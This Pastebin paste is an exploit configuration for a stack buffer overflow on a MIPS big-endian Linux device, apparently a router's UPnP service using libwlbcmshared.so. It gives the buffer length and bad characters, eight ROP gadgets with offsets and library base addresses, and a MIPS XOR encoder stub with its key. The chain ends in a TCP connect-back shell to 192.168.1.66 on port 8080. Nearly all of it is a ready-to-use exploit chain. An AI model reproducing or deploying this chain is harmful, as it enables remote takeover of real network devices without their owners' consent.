Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Overflow Description]
- arch = MIPS
- os = Linux
- endianness = BigEndian
- buffer length = 576
- bad characters = 0x00,0x0d,0x20
- [Section 1]
- type = RopGadget
- offset = 140
- description = upnp_context placeholder.
- rop_address = 0x0001ecbc
- base_address = 0x2aba1000
- [Section 2]
- type = RopGadget
- offset = 136
- description = The epilogue of sub_b100 in libwlbcmshared.so. Sets up S1-S7.
- rop_address = 0x0000b1f8
- base_address = 0x2aba1000
- [Section 3]
- type = RopGadget
- offset = 168
- description = An addr that can be dereferenced & written without crashing.
- rop_address = 0x0001ed10
- base_address = 0x2aba1000
- [Section 4]
- type = RopGadget
- offset = 200
- description = Sets up 3 sec arg to sleep(). jumps $s4
- rop_address = 0x0004b62c
- base_address = 0x2aabe000
- [Section 5]
- type = RopGadget
- offset = 184
- description = load stack data into ra, then jr $s2
- rop_address = 0x000380f0
- base_address = 0x2aabe000
- [Section 6]
- type = RopGadget
- offset = 176
- description = location of sleep() in libc.
- rop_address = 0x0004ffd0
- base_address = 0x2aabe000
- [Section 7]
- type = RopGadget
- offset = 240
- description = add offset from $sp into s5, jalr $s6
- rop_address = 0x000328f4
- base_address = 0x2aabe000
- [Section 8]
- type = RopGadget
- offset = 192
- description = Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.
- rop_address = 0x0001b1f4
- base_address = 0x2aabe000
- [Section 9]
- type = EncodedPayloadSection
- offset = 268
- encoder_class = MipsXorEncoder
- description = MIPS XOR decoder stub with 1 payload.
- key = 0xb59ed6f3
- payloads = Section 10
- [Section 10]
- payload_class = ConnectbackPayload
- description = TCP connect-back shell. Target address & port=192.168.1.66:8080
- connectback_ip = 192.168.1.66
- port = 8080
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement